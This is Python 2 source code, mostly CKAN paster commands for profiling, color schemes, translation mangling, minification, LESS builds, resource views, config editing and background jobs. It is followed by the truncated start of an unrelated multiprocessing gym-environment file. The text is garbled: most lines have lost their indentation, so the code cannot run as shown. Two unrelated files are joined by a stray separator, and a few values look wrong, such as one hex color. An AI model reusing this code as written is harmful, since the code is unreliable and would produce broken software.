output_filename = 'ckan%s.profile' % re.sub('[/?]', '.', url.replace('/', '.'))
profile_command = "profile_url('%s')" % url
cProfile.runctx(profile_command, globals(), locals(), filename=output_filename)
import pstats
stats = pstats.Stats(output_filename)
stats.sort_stats('cumulative')
stats.print_stats(0.1) # show only top 10% of lines
print 'Only top 10% of lines shown'
print 'Written profile to: %s' % output_filename
class CreateColorSchemeCommand(CkanCommand):
'''Create or remove a color scheme.
After running this, you'll need to regenerate the css files. See paster's less command for details.
color - creates a random color scheme
color clear - clears any color scheme
    color <'HEX'> - uses the given hex value as the base color eg '#ff00ff' (must be quoted)
color <VALUE> - a float between 0.0 and 1.0 used as base hue
color <COLOR_NAME> - html color name used for base color eg lightblue
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
rules = [
'@layoutLinkColor',
'@mastheadBackgroundColor',
'@btnPrimaryBackground',
'@btnPrimaryBackgroundHighlight',
]
# list of predefined colors
color_list = {
'aliceblue': '#f0fff8',
'antiquewhite': '#faebd7',
'aqua': '#00ffff',
'aquamarine': '#7fffd4',
'azure': '#f0ffff',
'beige': '#f5f5dc',
'bisque': '#ffe4c4',
'black': '#000000',
'blanchedalmond': '#ffebcd',
'blue': '#0000ff',
'blueviolet': '#8a2be2',
'brown': '#a52a2a',
'burlywood': '#deb887',
'cadetblue': '#5f9ea0',
'chartreuse': '#7fff00',
'chocolate': '#d2691e',
'coral': '#ff7f50',
'cornflowerblue': '#6495ed',
'cornsilk': '#fff8dc',
'crimson': '#dc143c',
'cyan': '#00ffff',
'darkblue': '#00008b',
'darkcyan': '#008b8b',
'darkgoldenrod': '#b8860b',
'darkgray': '#a9a9a9',
'darkgrey': '#a9a9a9',
'darkgreen': '#006400',
'darkkhaki': '#bdb76b',
'darkmagenta': '#8b008b',
'darkolivegreen': '#556b2f',
'darkorange': '#ff8c00',
'darkorchid': '#9932cc',
'darkred': '#8b0000',
'darksalmon': '#e9967a',
'darkseagreen': '#8fbc8f',
'darkslateblue': '#483d8b',
'darkslategray': '#2f4f4f',
'darkslategrey': '#2f4f4f',
'darkturquoise': '#00ced1',
'darkviolet': '#9400d3',
'deeppink': '#ff1493',
'deepskyblue': '#00bfff',
'dimgray': '#696969',
'dimgrey': '#696969',
'dodgerblue': '#1e90ff',
'firebrick': '#b22222',
'floralwhite': '#fffaf0',
'forestgreen': '#228b22',
'fuchsia': '#ff00ff',
'gainsboro': '#dcdcdc',
'ghostwhite': '#f8f8ff',
'gold': '#ffd700',
'goldenrod': '#daa520',
'gray': '#808080',
'grey': '#808080',
'green': '#008000',
'greenyellow': '#adff2f',
'honeydew': '#f0fff0',
'hotpink': '#ff69b4',
'indianred ': '#cd5c5c',
'indigo ': '#4b0082',
'ivory': '#fffff0',
'khaki': '#f0e68c',
'lavender': '#e6e6fa',
'lavenderblush': '#fff0f5',
'lawngreen': '#7cfc00',
'lemonchiffon': '#fffacd',
'lightblue': '#add8e6',
'lightcoral': '#f08080',
'lightcyan': '#e0ffff',
'lightgoldenrodyellow': '#fafad2',
'lightgray': '#d3d3d3',
'lightgrey': '#d3d3d3',
'lightgreen': '#90ee90',
'lightpink': '#ffb6c1',
'lightsalmon': '#ffa07a',
'lightseagreen': '#20b2aa',
'lightskyblue': '#87cefa',
'lightslategray': '#778899',
'lightslategrey': '#778899',
'lightsteelblue': '#b0c4de',
'lightyellow': '#ffffe0',
'lime': '#00ff00',
'limegreen': '#32cd32',
'linen': '#faf0e6',
'magenta': '#ff00ff',
'maroon': '#800000',
'mediumaquamarine': '#66cdaa',
'mediumblue': '#0000cd',
'mediumorchid': '#ba55d3',
'mediumpurple': '#9370d8',
'mediumseagreen': '#3cb371',
'mediumslateblue': '#7b68ee',
'mediumspringgreen': '#00fa9a',
'mediumturquoise': '#48d1cc',
'mediumvioletred': '#c71585',
'midnightblue': '#191970',
'mintcream': '#f5fffa',
'mistyrose': '#ffe4e1',
'moccasin': '#ffe4b5',
'navajowhite': '#ffdead',
'navy': '#000080',
'oldlace': '#fdf5e6',
'olive': '#808000',
'olivedrab': '#6b8e23',
'orange': '#ffa500',
'orangered': '#ff4500',
'orchid': '#da70d6',
'palegoldenrod': '#eee8aa',
'palegreen': '#98fb98',
'paleturquoise': '#afeeee',
'palevioletred': '#d87093',
'papayawhip': '#ffefd5',
'peachpuff': '#ffdab9',
'peru': '#cd853f',
'pink': '#ffc0cb',
'plum': '#dda0dd',
'powderblue': '#b0e0e6',
'purple': '#800080',
'red': '#ff0000',
'rosybrown': '#bc8f8f',
'royalblue': '#4169e1',
'saddlebrown': '#8b4513',
'salmon': '#fa8072',
'sandybrown': '#f4a460',
'seagreen': '#2e8b57',
'seashell': '#fff5ee',
'sienna': '#a0522d',
'silver': '#c0c0c0',
'skyblue': '#87ceeb',
'slateblue': '#6a5acd',
'slategray': '#708090',
'slategrey': '#708090',
'snow': '#fffafa',
'springgreen': '#00ff7f',
'steelblue': '#4682b4',
'tan': '#d2b48c',
'teal': '#008080',
'thistle': '#d8bfd8',
'tomato': '#ff6347',
'turquoise': '#40e0d0',
'violet': '#ee82ee',
'wheat': '#f5deb3',
'white': '#ffffff',
'whitesmoke': '#f5f5f5',
'yellow': '#ffff00',
'yellowgreen': '#9acd32',
}
def create_colors(self, hue, num_colors=5, saturation=None, lightness=None):
if saturation is None:
saturation = 0.9
if lightness is None:
lightness = 40
else:
lightness *= 100
        # Create num_colors related colours derived from the given base hue
        import math
        import colorsys
        saturation -= math.trunc(saturation)
        print hue, saturation
colors = []
for i in xrange(num_colors):
ix = i * (1.0/num_colors)
_lightness = (lightness + (ix * 40))/100.
if _lightness > 1.0:
_lightness = 1.0
color = colorsys.hls_to_rgb(hue, _lightness, saturation)
hex_color = '#'
for part in color:
hex_color += '%02x' % int(part * 255)
# check and remove any bad values
if not re.match('^\#[0-9a-f]{6}$', hex_color):
hex_color = '#FFFFFF'
colors.append(hex_color)
return colors
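    # For illustration only (not in the original source): create_colors(0.6,
    # num_colors=2) returns two '#rrggbb' strings that share the same hue but
    # step up in lightness; command() below takes the first len(self.rules)
    # colours from the default batch of five.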
def command(self):
hue = None
saturation = None
lightness = None
path = os.path.dirname(__file__)
path = os.path.join(path, '..', 'public', 'base', 'less', 'custom.less')
if self.args:
arg = self.args[0]
rgb = None
if arg == 'clear':
os.remove(path)
print 'custom colors removed.'
elif arg.startswith('#'):
color = arg[1:]
if len(color) == 3:
rgb = [int(x, 16) * 16 for x in color]
elif len(color) == 6:
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
print 'ERROR: invalid color'
elif arg.lower() in self.color_list:
color = self.color_list[arg.lower()][1:]
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
try:
hue = float(self.args[0])
except ValueError:
print 'ERROR argument `%s` not recognised' % arg
if rgb:
import colorsys
hue, lightness, saturation = colorsys.rgb_to_hls(*rgb)
lightness = lightness / 340
# deal with greys
if not (hue == 0.0 and saturation == 0.0):
saturation = None
else:
import random
hue = random.random()
if hue is not None:
f = open(path, 'w')
colors = self.create_colors(hue, saturation=saturation, lightness=lightness)
for i in xrange(len(self.rules)):
f.write('%s: %s;\n' % (self.rules[i], colors[i]))
print '%s: %s;\n' % (self.rules[i], colors[i])
            f.close()
print 'Color scheme has been created.'
print 'Make sure less is run for changes to take effect.'
class TranslationsCommand(CkanCommand):
'''Translation helper functions
trans js - generate the javascript translations
trans mangle - mangle the zh_TW translations for testing
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
from ckan.common import config
from ckan.lib.i18n import build_js_translations
ckan_path = os.path.join(os.path.dirname(__file__), '..')
self.i18n_path = config.get('ckan.i18n_directory',
os.path.join(ckan_path, 'i18n'))
command = self.args[0]
if command == 'mangle':
self.mangle_po()
elif command == 'js':
build_js_translations()
else:
print 'command not recognised'
def mangle_po(self):
''' This will mangle the zh_TW translations for translation coverage
testing.
        NOTE: This will destroy the current translations for zh_TW
'''
import polib
pot_path = os.path.join(self.i18n_path, 'ckan.pot')
po = polib.pofile(pot_path)
# we don't want to mangle the following items in strings
# %(...)s %s %0.3f %1$s %2$0.3f [1:...] {...} etc
# sprintf bit after %
spf_reg_ex = "\+?(0|'.)?-?\d*(.\d*)?[\%bcdeufosxX]"
extract_reg_ex = '(\%\([^\)]*\)' + spf_reg_ex + \
'|\[\d*\:[^\]]*\]' + \
'|\{[^\}]*\}' + \
'|<[^>}]*>' + \
'|\%((\d)*\$)?' + spf_reg_ex + ')'
for entry in po:
msg = entry.msgid.encode('utf-8')
matches = re.finditer(extract_reg_ex, msg)
length = len(msg)
position = 0
translation = u''
for match in matches:
translation += '-' * (match.start() - position)
position = match.end()
translation += match.group(0)
translation += '-' * (length - position)
entry.msgstr = translation
out_dir = os.path.join(self.i18n_path, 'zh_TW', 'LC_MESSAGES')
try:
os.makedirs(out_dir)
except OSError:
pass
po.metadata['Plural-Forms'] = "nplurals=1; plural=0\n"
out_po = os.path.join(out_dir, 'ckan.po')
out_mo = os.path.join(out_dir, 'ckan.mo')
po.save(out_po)
po.save_as_mofile(out_mo)
print 'zh_TW has been mangled'
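    # Worked example (illustrative, not part of the original command): the
    # msgid u'Welcome to %(site_title)s' gets the mangled msgstr
    # u'-----------%(site_title)s' -- every character becomes '-' except the
    # placeholders matched by extract_reg_ex above.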
class MinifyCommand(CkanCommand):
'''Create minified versions of the given Javascript and CSS files.
Usage:
paster minify [--clean] PATH
for example:
paster minify ckan/public/base
paster minify ckan/public/base/css/*.css
paster minify ckan/public/base/css/red.css
    If the --clean option is provided, any minified files will be removed.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
exclude_dirs = ['vendor']
def __init__(self, name):
super(MinifyCommand, self).__init__(name)
self.parser.add_option('--clean', dest='clean',
action='store_true', default=False,
help='remove any minified files in the path')
def command(self):
clean = getattr(self.options, 'clean', False)
self._load_config()
for base_path in self.args:
if os.path.isfile(base_path):
if clean:
self.clear_minifyed(base_path)
else:
self.minify_file(base_path)
elif os.path.isdir(base_path):
for root, dirs, files in os.walk(base_path):
                    dirs[:] = [d for d in dirs if d not in self.exclude_dirs]
for filename in files:
path = os.path.join(root, filename)
if clean:
self.clear_minifyed(path)
else:
self.minify_file(path)
else:
                # Path is neither a file nor a dir, so skip it
continue
def clear_minifyed(self, path):
path_only, extension = os.path.splitext(path)
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
if path_only.endswith('.min'):
print 'removing %s' % path
os.remove(path)
def minify_file(self, path):
'''Create the minified version of the given file.
If the file is not a .js or .css file (e.g. it's a .min.js or .min.css
file, or it's some other type of file entirely) it will not be
        minified.
:param path: The path to the .js or .css file to minify
'''
path_only, extension = os.path.splitext(path)
if path_only.endswith('.min'):
# This is already a minified file.
return
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
path_min = fanstatic_resources.min_path(path)
source = open(path, 'r').read()
f = open(path_min, 'w')
if path.endswith('.css'):
f.write(rcssmin.cssmin(source))
elif path.endswith('.js'):
f.write(rjsmin.jsmin(source))
f.close()
print "Minified file '{0}'".format(path)
class LessCommand(CkanCommand):
'''Compile all root less documents into their CSS counterparts
Usage:
paster less
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self.less()
custom_css = {
'fuchsia': '''
@layoutLinkColor: #E73892;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'green': '''
@layoutLinkColor: #2F9B45;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'red': '''
@layoutLinkColor: #C14531;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'maroon': '''
@layoutLinkColor: #810606;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
}
def less(self):
''' Compile less files '''
import subprocess
command = 'npm bin'
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
directory = output[0].strip()
less_bin = os.path.join(directory, 'lessc')
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
custom_less = os.path.join(root, 'less', 'custom.less')
for color in self.custom_css:
f = open(custom_less, 'w')
f.write(self.custom_css[color])
f.close()
self.compile_less(root, less_bin, color)
f = open(custom_less, 'w')
f.write('// This file is needed in order for ./bin/less to compile in less 1.3.1+\n')
f.close()
self.compile_less(root, less_bin, 'main')
def compile_less(self, root, less_bin, color):
print 'compile %s.css' % color
import subprocess
main_less = os.path.join(root, 'less', 'main.less')
main_css = os.path.join(root, 'css', '%s.css' % color)
command = '%s %s %s' % (less_bin, main_less, main_css)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
class FrontEndBuildCommand(CkanCommand):
'''Creates and minifies css and JavaScript files
Usage:
paster front-end-build
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
# Less css
cmd = LessCommand('less')
cmd.command()
# js translation strings
cmd = TranslationsCommand('trans')
cmd.options = self.options
cmd.args = ('js',)
cmd.command()
# minification
cmd = MinifyCommand('minify')
cmd.options = self.options
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
ckanext = os.path.join(os.path.dirname(__file__), '..', '..', 'ckanext')
ckanext = os.path.abspath(ckanext)
cmd.args = (root, ckanext)
cmd.command()
class ViewsCommand(CkanCommand):
'''Manage resource views.
Usage:
paster views create [options] [type1] [type2] ...
Create views on relevant resources. You can optionally provide
specific view types (eg `recline_view`, `image_view`). If no types
are provided, the default ones will be used. These are generally
the ones defined in the `ckan.views.default_views` config option.
        Note that in either case, plugins must be loaded (ie added to
`ckan.plugins`), otherwise the command will stop.
paster views clear [options] [type1] [type2] ...
Permanently delete all views or the ones with the provided types.
paster views clean
Permanently delete views for all types no longer present in the
`ckan.plugins` configuration option.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
def __init__(self, name):
super(ViewsCommand, self).__init__(name)
self.parser.add_option('-y', '--yes', dest='assume_yes',
action='store_true',
default=False,
help='''Automatic yes to prompts. Assume "yes"
as answer to all prompts and run non-interactively''')
self.parser.add_option('-d', '--dataset', dest='dataset_id',
action='append',
help='''Create views on a particular dataset.
You can use the dataset id or name, and it can be defined multiple times.''')
self.parser.add_option('--no-default-filters',
dest='no_default_filters',
action='store_true',
default=False,
help='''Do not add default filters for relevant
resource formats for the view types provided. Note that filters are not added
by default anyway if an unsupported view type is provided or when using the
`-s` or `-d` options.''')
self.parser.add_option('-s', '--search', dest='search_params',
action='store',
default=False,
help='''Extra search parameters that will be
used for getting the datasets to create the resource views on. It must be a
JSON object like the one used by the `package_search` API call. Supported
fields are `q`, `fq` and `fq_list`. Check the documentation for examples.
Not used when using the `-d` option.''')
def command(self):
self._load_config()
if not self.args:
print self.usage
elif self.args[0] == 'create':
view_plugin_types = self.args[1:]
self.create_views(view_plugin_types)
elif self.args[0] == 'clear':
view_plugin_types = self.args[1:]
self.clear_views(view_plugin_types)
elif self.args[0] == 'clean':
self.clean_views()
else:
print self.usage
_page_size = 100
def _get_view_plugins(self, view_plugin_types,
get_datastore_views=False):
'''
        Returns the view plugins that were successfully loaded
        Views are provided as a list of ``view_plugin_types``. If no types are
        provided, the default views defined in the ``ckan.views.default_views``
        config option will be created. Only in this case (when the default
        view plugins are used) can the ``get_datastore_views`` parameter be
        used to also return view plugins that require data to be in the
        DataStore.
If any of the provided plugins could not be loaded (eg it was not added
to `ckan.plugins`) the command will stop.
Returns a list of loaded plugin names.
'''
from ckan.lib.datapreview import (get_view_plugins,
get_default_view_plugins
)
log = logging.getLogger(__name__)
view_plugins = []
if not view_plugin_types:
log.info('No view types provided, using default types')
view_plugins = get_default_view_plugins()
if get_datastore_views:
view_plugins.extend(
get_default_view_plugins(get_datastore_views=True))
else:
view_plugins = get_view_plugins(view_plugin_types)
loaded_view_plugins = [view_plugin.info()['name']
for view_plugin in view_plugins]
plugins_not_found = list(set(view_plugin_types) -
set(loaded_view_plugins))
if plugins_not_found:
error('View plugin(s) not found : {0}. '.format(plugins_not_found)
+ 'Have they been added to the `ckan.plugins` configuration'
+ ' option?')
return loaded_view_plugins
def _add_default_filters(self, search_data_dict, view_types):
'''
Adds extra filters to the `package_search` dict for common view types
It basically adds `fq` parameters that filter relevant resource formats
for the view types provided. For instance, if one of the view types is
`pdf_view` the following will be added to the final query:
fq=res_format:"pdf" OR res_format:"PDF"
        This should only be used if all view types are known and can be
        filtered; otherwise we want all datasets to be returned. If a
        non-filterable view type is provided, the search params are not
        modified.
Returns the provided data_dict for `package_search`, optionally
modified with extra filters.
'''
from ckanext.imageview.plugin import DEFAULT_IMAGE_FORMATS
from ckanext.textview.plugin import get_formats as get_text_formats
from ckanext.datapusher.plugin import DEFAULT_FORMATS as \
datapusher_formats
filter_formats = []
for view_type in view_types:
if view_type == 'image_view':
for _format in DEFAULT_IMAGE_FORMATS:
filter_formats.extend([_format, _format.upper()])
elif view_type == 'text_view':
formats = get_text_formats(config)
for _format in itertools.chain.from_iterable(formats.values()):
filter_formats.extend([_format, _format.upper()])
elif view_type == 'pdf_view':
filter_formats.extend(['pdf', 'PDF'])
elif view_type in ['recline_view', 'recline_grid_view',
'recline_graph_view', 'recline_map_view']:
if datapusher_formats[0] in filter_formats:
continue
for _format in datapusher_formats:
if '/' not in _format:
filter_formats.extend([_format, _format.upper()])
else:
# There is another view type provided so we can't add any
# filter
return search_data_dict
filter_formats_query = ['+res_format:"{0}"'.format(_format)
for _format in filter_formats]
search_data_dict['fq_list'].append(' OR '.join(filter_formats_query))
return search_data_dict
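    # Worked example (derived from the code above, values illustrative): for
    # view_types=['pdf_view'] a single entry
    #     '+res_format:"pdf" OR +res_format:"PDF"'
    # is appended to search_data_dict['fq_list'], so package_search only
    # returns datasets that have a PDF resource.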
def _update_search_params(self, search_data_dict):
'''
Update the `package_search` data dict with the user provided parameters
Supported fields are `q`, `fq` and `fq_list`.
If the provided JSON object can not be parsed the process stops with
an error.
Returns the updated data dict
'''
log = logging.getLogger(__name__)
if not self.options.search_params:
return search_data_dict
try:
user_search_params = json.loads(self.options.search_params)
except ValueError, e:
error('Unable to parse JSON search parameters: {0}'.format(e))
if user_search_params.get('q'):
search_data_dict['q'] = user_search_params['q']
if user_search_params.get('fq'):
if search_data_dict['fq']:
search_data_dict['fq'] += ' ' + user_search_params['fq']
else:
search_data_dict['fq'] = user_search_params['fq']
        if (user_search_params.get('fq_list') and
                isinstance(user_search_params['fq_list'], list)):
            search_data_dict['fq_list'].extend(user_search_params['fq_list'])
        return search_data_dict
def _search_datasets(self, page=1, view_types=[]):
'''
Perform a query with `package_search` and return the result
Results can be paginated using the `page` parameter
'''
n = self._page_size
search_data_dict = {
'q': '',
'fq': '',
'fq_list': [],
'include_private': True,
'rows': n,
'start': n * (page - 1),
}
if self.options.dataset_id:
search_data_dict['q'] = ' OR '.join(
['id:{0} OR name:"{0}"'.format(dataset_id)
for dataset_id in self.options.dataset_id]
)
elif self.options.search_params:
self._update_search_params(search_data_dict)
elif not self.options.no_default_filters:
self._add_default_filters(search_data_dict, view_types)
if not search_data_dict.get('q'):
search_data_dict['q'] = '*:*'
query = p.toolkit.get_action('package_search')(
{}, search_data_dict)
return query
def create_views(self, view_plugin_types=[]):
from ckan.lib.datapreview import add_views_to_dataset_resources
log = logging.getLogger(__name__)
datastore_enabled = 'datastore' in config['ckan.plugins'].split()
loaded_view_plugins = self._get_view_plugins(view_plugin_types,
datastore_enabled)
context = {'user': self.site_user['name']}
page = 1
while True:
query = self._search_datasets(page, loaded_view_plugins)
if page == 1 and query['count'] == 0:
error('No datasets to create resource views on, exiting...')
elif page == 1 and not self.options.assume_yes:
msg = ('\nYou are about to check {0} datasets for the ' +
'following view plugins: {1}\n' +
' Do you want to continue?')
confirm = query_yes_no(msg.format(query['count'],
loaded_view_plugins))
if confirm == 'no':
error('Command aborted by user')
if query['results']:
for dataset_dict in query['results']:
if not dataset_dict.get('resources'):
continue
views = add_views_to_dataset_resources(
context,
dataset_dict,
view_types=loaded_view_plugins)
if views:
view_types = list(set([view['view_type']
for view in views]))
msg = ('Added {0} view(s) of type(s) {1} to ' +
'resources from dataset {2}')
log.debug(msg.format(len(views),
', '.join(view_types),
dataset_dict['name']))
if len(query['results']) < self._page_size:
break
page += 1
else:
break
log.info('Done')
def clear_views(self, view_plugin_types=[]):
log = logging.getLogger(__name__)
if not self.options.assume_yes:
if view_plugin_types:
msg = 'Are you sure you want to delete all resource views ' + \
'of type {0}?'.format(', '.join(view_plugin_types))
else:
msg = 'Are you sure you want to delete all resource views?'
result = query_yes_no(msg, default='no')
if result == 'no':
error('Command aborted by user')
context = {'user': self.site_user['name']}
logic.get_action('resource_view_clear')(
context, {'view_types': view_plugin_types})
log.info('Done')
def clean_views(self):
names = []
for plugin in p.PluginImplementations(p.IResourceView):
names.append(str(plugin.info()['name']))
results = model.ResourceView.get_count_not_in_view_types(names)
if not results:
print 'No resource views to delete'
return
        print 'This command will delete the following resource views:\n'
for row in results:
print '%s of type %s' % (row[1], row[0])
result = query_yes_no('Do you want to delete these resource views:', default='no')
if result == 'no':
print 'Not Deleting.'
return
model.ResourceView.delete_not_in_view_types(names)
model.Session.commit()
print 'Deleted resource views.'
class ConfigToolCommand(paste.script.command.Command):
'''Tool for editing options in a CKAN config file
paster config-tool <default.ini> <key>=<value> [<key>=<value> ...]
paster config-tool <default.ini> -f <custom_options.ini>
Examples:
paster config-tool default.ini sqlalchemy.url=123 'ckan.site_title=ABC'
paster config-tool default.ini -s server:main -e port=8080
paster config-tool default.ini -f custom_options.ini
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
default_verbosity = 1
group_name = 'ckan'
usage = __doc__
summary = usage.split('\n')[0]
parser.add_option('-s', '--section', dest='section',
default='app:main', help='Section of the config file')
parser.add_option(
'-e', '--edit', action='store_true', dest='edit', default=False,
help='Checks the option already exists in the config file')
parser.add_option(
'-f', '--file', dest='merge_filepath', metavar='FILE',
help='Supply an options file to merge in')
def command(self):
import config_tool
if len(self.args) < 1:
self.parser.error('Not enough arguments (got %i, need at least 1)'
% len(self.args))
config_filepath = self.args[0]
if not os.path.exists(config_filepath):
self.parser.error('Config filename %r does not exist.' %
config_filepath)
if self.options.merge_filepath:
config_tool.config_edit_using_merge_file(
config_filepath, self.options.merge_filepath)
options = self.args[1:]
if not (options or self.options.merge_filepath):
self.parser.error('No options provided')
if options:
for option in options:
if '=' not in option:
error(
'An option does not have an equals sign: %r '
'It should be \'key=value\'. If there are spaces '
'you\'ll need to quote the option.\n' % option)
try:
config_tool.config_edit_using_option_strings(
config_filepath, options, self.options.section,
edit=self.options.edit)
except config_tool.ConfigToolError, e:
error(traceback.format_exc())
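    # Example invocation (taken from the usage text above):
    #     paster config-tool default.ini 'ckan.site_title=ABC'
    # updates the ckan.site_title option in the [app:main] section of
    # default.ini.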
class JobsCommand(CkanCommand):
'''Manage background jobs
Usage:
paster jobs worker [--burst] [QUEUES]
Start a worker that fetches jobs from queues and executes
them. If no queue names are given then the worker listens
            to the default queue; this is equivalent to
paster jobs worker default
If queue names are given then the worker listens to those
queues and only those:
paster jobs worker my-custom-queue
Hence, if you want the worker to listen to the default queue
and some others then you must list the default queue explicitly:
paster jobs worker default my-custom-queue
If the `--burst` option is given then the worker will exit
as soon as all its queues are empty.
paster jobs list [QUEUES]
List currently enqueued jobs from the given queues. If no queue
names are given then the jobs from all queues are listed.
paster jobs show ID
Show details about a specific job.
paster jobs cancel ID
Cancel a specific job. Jobs can only be canceled while they are
enqueued. Once a worker has started executing a job it cannot
be aborted anymore.
paster jobs clear [QUEUES]
Cancel all jobs on the given queues. If no queue names are
given then ALL queues are cleared.
paster jobs test [QUEUES]
Enqueue a test job. If no queue names are given then the job is
added to the default queue. If queue names are given then a
separate test job is added to each of the queues.
'''
summary = __doc__.split(u'\n')[0]
usage = __doc__
min_args = 0
def __init__(self, *args, **kwargs):
super(JobsCommand, self).__init__(*args, **kwargs)
try:
self.parser.add_option(u'--burst', action='store_true',
default=False,
help=u'Start worker in burst mode.')
except OptionConflictError:
# Option has already been added in previous call
pass
def command(self):
self._load_config()
try:
cmd = self.args.pop(0)
except IndexError:
print(self.__doc__)
sys.exit(0)
if cmd == u'worker':
self.worker()
elif cmd == u'list':
self.list()
elif cmd == u'show':
self.show()
elif cmd == u'cancel':
self.cancel()
elif cmd == u'clear':
self.clear()
elif cmd == u'test':
self.test()
else:
error(u'Unknown command "{}"'.format(cmd))
def worker(self):
from ckan.lib.jobs import Worker
Worker(self.args).work(burst=self.options.burst)
def list(self):
data_dict = {
u'queues': self.args,
}
jobs = p.toolkit.get_action(u'job_list')({}, data_dict)
for job in jobs:
if job[u'title'] is None:
job[u'title'] = ''
else:
job[u'title'] = u'"{}"'.format(job[u'title'])
print(u'{created} {id} {queue} {title}'.format(**job))
def show(self):
if not self.args:
error(u'You must specify a job ID')
id = self.args[0]
try:
job = p.toolkit.get_action(u'job_show')({}, {u'id': id})
except logic.NotFound:
error(u'There is no job with ID "{}"'.format(id))
print(u'ID: {}'.format(job[u'id']))
if job[u'title'] is None:
title = u'None'
else:
title = u'"{}"'.format(job[u'title'])
print(u'Title: {}'.format(title))
print(u'Created: {}'.format(job[u'created']))
print(u'Queue: {}'.format(job[u'queue']))
def cancel(self):
if not self.args:
error(u'You must specify a job ID')
id = self.args[0]
try:
p.toolkit.get_action(u'job_cancel')({}, {u'id': id})
except logic.NotFound:
error(u'There is no job with ID "{}"'.format(id))
print(u'Cancelled job {}'.format(id))
def clear(self):
data_dict = {
u'queues': self.args,
}
queues = p.toolkit.get_action(u'job_clear')({}, data_dict)
queues = (u'"{}"'.format(q) for q in queues)
print(u'Cleared queue(s) {}'.format(u', '.join(queues)))
def test(self):
from ckan.lib.jobs import DEFAULT_QUEUE_NAME, enqueue, test_job
for queue in (self.args or [DEFAULT_QUEUE_NAME]):
job = enqueue(test_job, [u'A test job'], title=u'A test job', queue=queue)
print(u'Added test job {} to queue "{}"'.format(job.id, queue))
|
multiprocessing_env.py
|
import logging
import multiprocessing
import numpy as np
import traceback
import gym
from gym import spaces
from universe.vectorized import core
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class Error(Exception):
pass
def display_name(exception):
prefix = ''
# AttributeError has no __module__; RuntimeError has module of
# exceptions
if hasattr(exception, '__module__') and exception.__module__ != 'exceptions':
prefix = exception.__module__ + '.'
return prefix + type(exception).__name__
def render_dict(error):
return {
'type': display_name(error),
'message': error.message,
'traceback': traceback.format_exc(error)
}
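# Illustration (assumed example, not from the original source): under Python 2,
# render_dict(ValueError('boom')) produces a dict shaped like
#     {'type': 'ValueError', 'message': 'boom', 'traceback': '...'}
# (builtin exceptions live in the `exceptions` module, so no prefix is added).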
class Worker(object):
def __init__(self, env_m, worker_idx):
# These are instantiated in the *parent* process
# currently. Probably will want to change this. The parent
# does need to obtain the relevant Spaces at some stage, but
# that's doable.
self.worker_idx = worker_idx
self.env_m = env_m
self.m = len(env_m)
self.parent_conn, self.child_conn = multiprocessing.Pipe()
self.joiner = multiprocessing.Process(target=self.run)
self._clear_state()
self.start()
# Parent only!
self.child_conn.close()
def _clear_state(self):
self.mask = [True] * self.m
# Control methods
def start(self):
self.joiner.start()
def _parent_recv(self):
rendered, res = self.parent_conn.recv()
if rendered is not None:
raise Error('[Worker {}] Error: {} ({})\n\n{}'.format(self.worker_idx, rendered['message'], rendered['type'], rendered['traceback']))
return res
def _child_send(self, msg):
self.child_conn.send((None, msg))
def _parent_send(self, msg):
try:
self.parent_conn.send(msg)
except IOError: # the worker is now dead
try:
res = self._parent_recv()
except EOFError:
raise Error('[Worker {}] Child died unexpectedly'.format(self.worker_idx))
else:
raise Error('[Worker {}] Child returned unexpected result: {}'.format(self.worker_idx, res))
def close_start(self):
self._parent_send(('close', None))
def close_finish(self):
self.joiner.join()
def reset_start(self):
self._parent_send(('reset', None))
def reset_finish(self):
return self._parent_recv()
def step_start(self, action_m):
"""action_m: the batch of actions for this worker"""
self._parent_send(('step', action_m))
def step_finish(self):
return self._parent_recv()
def mask_start(self, i):
self._parent_send(('mask', i))
def seed_start(self, seed_m):
self._parent_send(('seed', seed_m))
def render_start(self, mode, close):
self._parent_send(('render', (mode, close)))
def render_finish(self):
return self._parent_recv()
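    # Illustrative parent-side usage of the start/finish pairs (see step_n
    # below for the real call site):
    #     worker.step_start(action_m)                         # non-blocking send
    #     obs_m, rew_m, done_m, info = worker.step_finish()   # blocking recv
    # Splitting send and receive lets the caller fan work out to every worker
    # before collecting any results.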
def run(self):
try:
self.do_run()
except Exception as e:
rendered = render_dict(e)
self.child_conn.send((rendered, None))
return
def do_run(self):
# Child only!
self.parent_conn.close()
while True:
method, body = self.child_conn.recv()
logger.debug('[%d] Received: method=%s body=%s', self.worker_idx, method, body)
if method == 'close':
logger.info('Closing envs')
